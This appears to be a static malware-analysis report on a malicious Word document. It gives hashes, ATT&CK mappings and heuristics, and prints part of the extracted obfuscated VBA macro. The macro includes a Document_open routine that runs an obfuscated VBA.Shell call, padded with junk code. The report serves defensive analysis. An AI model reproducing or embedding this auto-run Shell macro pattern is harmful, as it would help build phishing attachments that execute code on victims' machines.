Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 35ee386898321e2d…

MALICIOUS

Office (OLE)

175.6 KB Created: 2018-07-23 13:37:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: e4e36e0cccfa0a5f2e727a1a2c734683 SHA-1: d4b0da6402877a87dd2b5dd00b0d1a2282a6fb46 SHA-256: 35ee386898321e2d778908c2275fa270419e0b02d91dc3d5db8a745293219d95
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The critical heuristic firing for Shell() call in VBA indicates that the macro attempts to execute external commands or payloads. The ClamAV detection further confirms its malicious nature. The obfuscated nature of the VBA code suggests it is designed to download and execute a second-stage payload.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-6989445-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6989445-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25218 bytes
SHA-256: 036e8c13853aaeb244d069d2469e893be2ee1a95ebe67fa07a23d0df844c8a44
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "hzqoUrQTfEOO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function rjDMdTWbjwIsI()
On Error Resume Next
   If PoXtj Xor zVwMz Then
      zTTfz = 134100329
   End If
   If djYPSS Xor aftIUZ Then
      zXJji = 134100329
   End If
   If SPczw Xor hWjlb Then
      OsXiT = 134100329
   End If
   If rKHzjz Xor IPRLV Then
      qbrYF = 134100329
   End If
   If lUbnsX Xor zvJwPW Then
      lVQQl = 134100329
   End If
End Function
Private Function ZDNfTBnRmYIi()
On Error Resume Next
   If qSQqjc Xor zpjSW Then
      SbFEV = 134100329
   End If
   If aNdMw Xor UphTmT Then
      YzvFXF = 134100329
   End If
   If GSdnq Xor JiOcfK Then
      qdszW = 134100329
   End If
   If iMDTLo Xor JzkEjV Then
      TvAZF = 134100329
   End If
   If QrWKSi Xor UtXGfj Then
      Itqcp = 134100329
   End If
End Function
Private Function ZNGSwzA()
On Error Resume Next
   If qukql Xor jlfvOK Then
      MzLGS = 134100329
   End If
   If aIUFM Xor EzqtN Then
      dOYXH = 134100329
   End If
   If OnwIb Xor wFJKB Then
      IbRGcH = 134100329
   End If
   If lCGcPM Xor fkwcc Then
      RnLXu = 134100329
   End If
   If ZSjdO Xor jwwhvo Then
      dqSdAs = 134100329
   End If
   If Nvopu Xor oMIvP Then
      FzvDT = 134100329
   End If
End Function
Private Sub Document_open()
On Error Resume Next
   If fAtJvq = PNFHCq Then
      VWXIAw = ITSti * 102768365
   End If
   If pMbksN = pjUwi Then
      Alajw = HorPAI * 102768365
   End If
   If zopTU = YcEDuu Then
      LYlwbo = lmwcL * 102768365
   End If
   If jwjjk = hiTPk Then
      Ajwjt = rTHjP * 102768365
   End If
VBA.Shell "" + hbQRFPaAiW + pjqCJRbMXsm + CVar("C") + drzwabQriIFDhd + kwJlESIBNrr + BonnVRGw + tWEtX + uZruUPj + dYNsMHc + fUTKiDjEVNPnr, 0
   If DNTYE = jVUhlJ Then
      bDdjj = SLZEMP * 102768365
   End If
   If udIGI = UmUUSz Then
      KmDpf = BTLbb * 102768365
   End If
   If uAAPml = pznEM Then
      wzwcst = dSkfE * 102768365
   End If
End Sub
Private Function BcPUKmRL()
On Error Resume Next
   If ZGthW = rFpzY Then
      WiAwY = XknzjA * 102768365
   End If
   If hvjUMf = KtVErO Then
      zhzAjB = mmSTKF * 102768365
   End If
   If kiiYqW = EOaWj Then
      GUOun = tNhFj * 102768365
   End If
   If uIQBC = dCfNFQ Then
      mQtQs = DPMmL * 102768365
   End If
   If NHwaN = jnhHj Then
      RaAGKN = VdoQc * 102768365
   End If
End Function
Private Function SanpbjzMTYiN()
On Error Resume Next
   If iWsCa = ZmaUAj Then
      GjWZu = cMlqiD * 102768365
   End If
   If KiscXq = HJujq Then
      mbXcJ = wwMAcT * 102768365
   End If
   If bbFpj = HYhzkv Then
      TiFrD = ukFqZ * 102768365
   End If
   If jwiQIp = wGYpz Then
      vHtWYQ = VnvHS * 102768365
   End If
   If LBlFjz = fhAEt Then
      aLQtJ = fMkwwZ * 102768365
   End If
End Function
Private Function QjDZuASz()
On Error Resume Next
   If ildsRJ = nfRmoR Then
      OnYUKo = okqQtj * 102768365
   End If
   If jDRoz = UqnQS Then
      QIPMol = WsQXvb * 102768365
   End If
   If PvuXPF = cFkiJ Then
      TzwXK = mijcT * 102768365
   End If
   If TPjVNd = vMjLhA Then
      QdFszv = hmoED * 102768365
   End If
   If ZdGElr = slGvnj Then
      KdjrX = uKiMh * 102768365
   End If
End Function


Attribute VB_Name = "RWkfRXKkffYmW"
Private Function nESfuLiw()
On Error Resume Next
   If cEJaZz = Wmdstw Then
      For vIhnTc = 155 To 516331127
         nAHOY = 21658 + uEDztO / (46281 * DsjdwS * 67395 * FuqfQ)
      Next
      Else
      TtHBr = (DCLAml / hasAkS)
   End If
   If qQHTPD = vkNlu Then
      For EjONfj = 155 To 516331127
         pfiAK = 38586 + CJEloB / (45648 * OAWOZL * 56615 * zwlzN)
      Next
      Else
      XVXKO = (KmHIvH / mjbws)
   End If
   If iMzCM = DHmMB Then
      For wjEqJ = 155 To 516331127
         SAqXC = 31756 + koKVD 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.